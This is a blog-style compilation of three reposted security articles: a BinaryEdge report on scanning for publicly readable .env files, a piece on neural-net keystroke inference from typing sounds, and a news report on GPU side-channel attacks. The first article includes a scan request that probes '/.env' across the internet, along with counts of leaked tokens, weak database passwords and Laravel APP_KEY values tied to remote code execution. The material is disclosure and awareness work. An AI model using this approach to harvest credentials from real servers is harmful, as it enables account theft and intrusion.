Publicly accessible .ENV files

( Original text by BinaryEdge )

Deployment is something a lot of companies still struggle with. We talked about the issue with Kubernetes being deployed insecurely a few weeks ago in a blogpost and how the kubernetes pods are being hijacked to mine for cryptocurrency.

This week we look at something different but still related to deployments and exposing things to public that should not be.

One tweet from @svblxyz (whom we would also like to thank for all the help given to us on reviewing this post and giving tips on things to add) showed us an interesting google dork which made us wonder, what does this look like for IP adresses vs domain/services focused (as google search is).View image on Twitter

View image on Twitter

svbl@svblxyz

👏

Don’t put your .env files in the web-server directory https://www.google.com/search?q=db_password+filetype%3Aenv …2,7829:15 PM — Sep 26, 20181,950 people are talking about thisTwitter Ads info and privacy

So we launched a scan using our distributed platform, as simple as:

> curl https://api.binaryedge.io/v1/tasks -d '{
      "description": "HTTP Worldscan .env",
      "type": "scan",
      "options": [{
        "targets": ["XXXX"],
        "ports": [{
            "modules": ["http"],
            "port": "80",
            "config": { "http_path": "/.env" }
        }]
      }]
      }' -H 'X-Token:XXXXXX'

After this we started getting the results and of course multiple issues can be identified on these scans:

  • Bad Deployments — The .ENV files being accessible is something that shouldn’t happen — there are companies exposing this type of file fully readable with no authentication.
  • Weak credentials — Lots of services with a username/password combo using weak passwords.

Credentials and Tokens

Lots different types of Service Tokens were found:

  • AWS — 38 tokens
  • Mangopay — 9 tokens
  • Stripe — 89 tokens
  • Pusher — 1600 Tokens

Other tokens found include:

  • PlugandPlay
  • Paypal
  • Mailchimp
  • Facebook
  • PhantomJS
  • Mailgun
  • Twitter
  • JWT
  • Google
  • WeChat
  • Shopify
  • Nexmo.
  • Bitly
  • Braintree
  • Twilio
  • Recaptcha
  • Ucloud
  • Firebase
  • Mandrill
  • Slack
  • Sentry.io
  • Shopzcoin

Many of these systems involve financial records/ payments.

But we also found access configurations to Databases, which potentially contain customer data, such as:

  • DB_PASSWORD keys: 1161
  • REDIS_PASSWORD keys: 801
  • MySQL credentials: 946 (username/password combos).

Looking at the passwords being used the top 3 we see they all consist of weak passwords:

1 — secret — 93
2 — root — 33
3 — adminadmin — 24

Other weak passwords found are:

  • password
  • test123
  • foobar

When exposed tokens go super bad…

Laravel

Something that is also very dangerous is situations like the CVE-2018-15133 where if the APP_KEY is leaked for the Laravel app, allows an attacker to execute commands on the machine where the Laravel instance is running.

And our scan found: 300 APP_KEY Tokens related to Laravel.

One important note to be taken into account, we looked only at port 80 internet wide for our scan. The exposure on this can easily be much higher as other web apps will surely be exposing more .env files!

Реклама

Acoustic Audio Patterns Could Be Giving Away Your Passwords, Learned by Neural Nets

( Original text by nugget )

In an age where Facebook, Google, Amazon, and many others are amassing an immense amount of data, what could be more concerning than drastic advancements in artificial intelligence? Thanks to neural networks and deep learning, tons of decision problems can be solved by simply having enough labelled data. The implications of this big data coexisting with the artificial intelligence to harvest information from it are endless. Not only are there good implications, including self-driving cars, voice recognition like Amazon Alexa, and intelligent applications like Google Maps, but there are also many bad implications like mass user-profiling, potential government intrusion, and, you guessed it, breaches into modern cryptographic security. Thanks to deep learning and neural networks, your password for most applications might just be worthless.

Since the cryptographic functions used in password hashing are currently secure, many attacks attempt to acquire the user’s password before it even reaches the database. For more information, see this article on password applications and security. For this reason, attacks using keyloggers, dictionary attacks, and inference attacks based on common password patterns are common, and these attacks actually work quite frequently. Now, however, deep learning has paved the way for a new kind of inference attack, based on the sound of the keys being typed.

History

Investigations into audio distinguishing between keystrokes are not new. Scientists have been exploring this attack vector for many years. In 2014, scientists used digraphs to model an alphabet based on keystroke sounds. In addition, statistical techniques are used in conjunction with the likely letters that are being typed (determined by the sound patterns) to create words that have a statistical likelihood of being typed based on the overall typing sound. This “shallow learning” approach is a good example of a specific set of techniques developed for a specific task in data science research.

Approaches like this one were used for years in fields like image feature recognition. The results were never groundbreaking, because it is very difficult for humans to create a perfect model for a task that has a massive amount of considerable variables. However, deep learning is now in the picture, and has been for some time. Image recognition with deep learning is so good it is almost magical, and it certainly is scary. This means that this task of matching keystroke sounds with the keystrokes themselves might just be possible.

Implications of Neural Networks

Nowadays, training models using audio for keyboard stroke recognition is a successfully performed task. Keystroke sound has been successfully used as a bio-metric authentication factor. While this fact is cool, the deeper meanings are quite scary. With the ability to train a massive neural network on the plethora of labelled keystroke sound data available on the web, a high-accuracy model can be created with little effort that predicts keystrokes based on audio with high accuracy.

Combined with other inference approaches, you could be vulnerable any time anyone is able to record you type your password. In fact, according to this article by phys.org, with some small information, such as keyboard type and typist style, attackers have a 91.7% accuracy of determining keystrokes. Without this information, they still have an impressive 41.89% accuracy. Even with this low keystroke accuracy, attackers may still be able to determine your password as the small accuracy could still clue them into your password style, e.g. using children’s or pet’s names in your passwords. Once attackers have an idea of your password style, they can massively reduce the password space, as stated in this article. With a reduced possible password space, brute force and dictionary attacks become extremely viable. Essentially, with advancements in deep learning, the audio of you typing your password is definitely a vulnerable vector of attack.

What you can do to protect yourself

The main vulnerability of this attack lies in the VOIP software widely used by companies and individuals alike to communicate. When you use software like Skype, your audio is obviously transmitted to your call partners. This audio, clearly, includes audio of you typing. This typing could be deciphered using machine learning and inference attacks, and any attacker on the call could decipher some or all of what is being typed. Of course, some of this typed text may include passwords or other sensitive information that an attacker may want. Other vulnerabilities include any situation where someone may be able to covertly record your keystrokes. For example, someone may record you typing in person by using their phone without you knowing.

So, to protect yourself, be sure that you have a second factor authenticating you in important security applications. Most login interfaces such as Gmail offer 2-factor authentication. Be sure that this is enabled, and your password will not be the only factor in your login. This reduces the risk of attackers obtaining your password. Additionally, of course, using good password practiceswill make it harder for inference attacks to supplement deep learning in acquiring your password. Finally, you could certainly reduce the risk of audio-based attacks by not typing in passwords when on VOIP calls.

Conclusion

Certainly, there isn’t much to do to mitigate the risk of your typing audio being eavesdropped. The implications that deep learning have on audio-based password attacks are definitely scary.  It’s a fact that neural networks might mean that your password is worthless, and they’re only getting stronger. The future of artificial intelligence will change not only modern authentication systems, but it will change society in ways we can’t even imagine. The only thing we can do in response is be aware and adapt.

If you have any questions or comments about this post, feel free to leave a comment or contact me!

GPU side channel attacks can enable spying on web activity, password stealing

( Original text )

Computer scientists at the University of California, Riverside have revealed for the first time how easily attackers can use a computer’s graphics processing unit, or GPU, to spy on web activity, steal passwords, and break into cloud-based applications.

GPU side channel attacks

Threat scenarios

Marlan and Rosemary Bourns College of Engineering computer science doctoral student Hoda Naghibijouybari and post-doctoral researcher Ajaya Neupane, along with Associate Professor Zhiyun Qian and Professor Nael Abu-Ghazaleh, reverse engineered a Nvidia GPU to demonstrate three attacks on both graphics and computational stacks, as well as across them.

All three attacks require the victim to first acquire a malicious program embedded in a downloaded app. The program is designed to spy on the victim’s computer.

Web browsers use GPUs to render graphics on desktops, laptops, and smart phones. GPUs are also used to accelerate applications on the cloud and data centers. Web graphics can expose user information and activity. Computational workloads enhanced by the GPU include applications with sensitive data or algorithms that might be exposed by the new attacks.

GPUs are usually programmed using application programming interfaces, or APIs, such as OpenGL. OpenGL is accessible by any application on a desktop with user-level privileges, making all attacks practical on a desktop. Since desktop or laptop machines by default come with the graphics libraries and drivers installed, the attack can be implemented easily using graphics APIs.

The first attack tracks user activity on the web. When the victim opens the malicious app, it uses OpenGL to create a spy to infer the behavior of the browser as it uses the GPU. Every website has a unique trace in terms of GPU memory utilization due to the different number of objects and different sizes of objects being rendered. This signal is consistent across loading the same website several times and is unaffected by caching.

The researchers monitored either GPU memory allocations over time or GPU performance counters and fed these features to a machine learning based classifier, achieving website fingerprinting with high accuracy. The spy can reliably obtain all allocation events to see what the user has been doing on the web.

In the second attack, the authors extracted user passwords. Each time the user types a character, the whole password textbox is uploaded to GPU as a texture to be rendered. Monitoring the interval time of consecutive memory allocation events leaked the number of password characters and inter-keystroke timing, well-established techniques for learning passwords.

The third attack targets a computational application in the cloud. The attacker launches a malicious computational workload on the GPU which operates alongside the victim’s application. Depending on neural network parameters, the intensity and pattern of contention on the cache, memory and functional units differ over time, creating measurable leakage. The attacker uses machine learning-based classification on performance counter traces to extract the victim’s secret neural network structure, such as number of neurons in a specific layer of a deep neural network.

The researchers reported their findings to Nvidia, who responded that they intend to publish a patch that offers system administrators the option to disable access to performance counters from user-level processes. They also shared a draft of the paper with the AMD and Intel security teams to enable them to evaluate their GPUs with respect to such vulnerabilities.

In the future the group plans to test the feasibility of GPU side channel attacks on Android phones.